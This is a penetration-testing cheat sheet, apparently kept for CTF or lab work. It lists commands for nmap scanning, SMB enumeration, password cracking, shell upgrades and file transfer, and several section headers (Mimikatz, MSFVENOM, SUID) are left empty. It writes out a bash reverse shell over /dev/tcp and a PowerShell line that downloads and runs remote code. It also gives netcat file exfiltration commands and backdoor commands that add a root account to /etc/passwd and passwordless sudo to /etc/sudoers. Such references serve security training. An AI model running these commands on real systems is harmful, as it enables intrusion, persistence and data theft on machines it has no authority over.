Quick Guide

List of Commands

NMAP

Full TCP: sudo nmap -Pn -A -p- -T4 $IP -o tcp-scan.txt

UDP: sudo nmap -sUV -F -T4 $IP -o udp-scan.txt

HTTP: sudo nmap -Pn -T4 -p 80 --script=http-enum $IP

SMB: sudo nmap -Pn -T4 --script smb-vuln* -p 139,145 $IP

SMB Enum: sudo nmap -Pn -T4 --script=smb-enum-shares.nse -p 445 $IP

Enumerate given ports: sudo nmap -sV -sV -p $PORTS $IP

Network: nmap -sn 10.10.10.1/24, 10.10.11.1-253, 10.10.12.*

SAMBA

Tool smbmap:

  • smbmap -H $TARGET

Tool enum4linux:

  • enum4linux -a $TARGET

Tool smbclient:

  • smbclient -L $TARGET -N

  • smbclient //$TARGET/$DRIVE -U guest

Tool crackmapexec:

  • crackmapexec smb $TARGET -u 'guest' -p '' --rid-brute

MySQL: mysql -h $TARGET -u $USER -p $PASS

SQSH: sqsh -S $TARGET -U $USER -p "$PASS"

DIRSEARCH

python3 dirsearch.py -e txt,html,php,sh -w $WORDLIST -t 10 -u $IP

BANNERS

nc $IP $PORT

ESCAPE SHELLS

Python: python -c 'import pty;pty.spawn("/bin/bash")'

Echo: echo os.system('/bin/bash')

Bash: /bin/bash -i

ENV: SHELL=/bin/bash script -q /dev/null

REVERSE SHELLS

Bash: /bin/bash -c 'bash -i >& /dev/tcp/$IP/$PORT 0>&1'

HASHCAT

Run: sudo hashcat -m $TYPE -a 0 $HASHFILE $WORDLIST -O

Show: sudo hashcat -m $TYPE $HASHFILE --show

ROOT

Passwd: echo r00t:0Wna/pt5B0TzM:0:0:r00t:/root:/bin/bash >> /etc/passwd

Sudoers: echo "user ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers

Find:

TRANSFER & SHARE

Netcat:

  • Receiver: nc -nvlp $PORT > $FILE

  • Giver: nc $IP $PORT < $FILE

Python:

  • Host: python -m http.client $PORT

  • Client: wget http://$IP/$FILE -O $FILE

Powershell:

  • Execute remote program: powershell iex(new-object net.webclient).downloadString('http://$IP:$PORT/$FILE')

  • Download remote file: powershell invoke-webrequest -uri "http://$IP/$FILE" -outfile "$FILE"

Samba:

  • Start sharing: sudo smbserver.py share .

  • Copy: copy \\$IP\share\$FILE $FILE

LINUX QUICK

Find: find / -iname "*$PATTER*" -print 2>/dev/null

Grep: grep -iRl "$PATTERN" . 2>/dev/null

Versions:

Network:

Searching:

SUID:

Ping Sweep:

WINDOWS QUICK

RDP: xfreerdp /u:$USER /p:$PASS /v:$HOST:$PORT /drive:$PATH /dynamic-resolution +clipboard

Upgrade Shell: system("start cmd.exe /k $SHELL")

Basic Cmds:

Exploit Suggester:

Mimikatz:

COMPILING C

MSFVENOM

Most used examples:

The following was used for a B0F challenge:

Last updated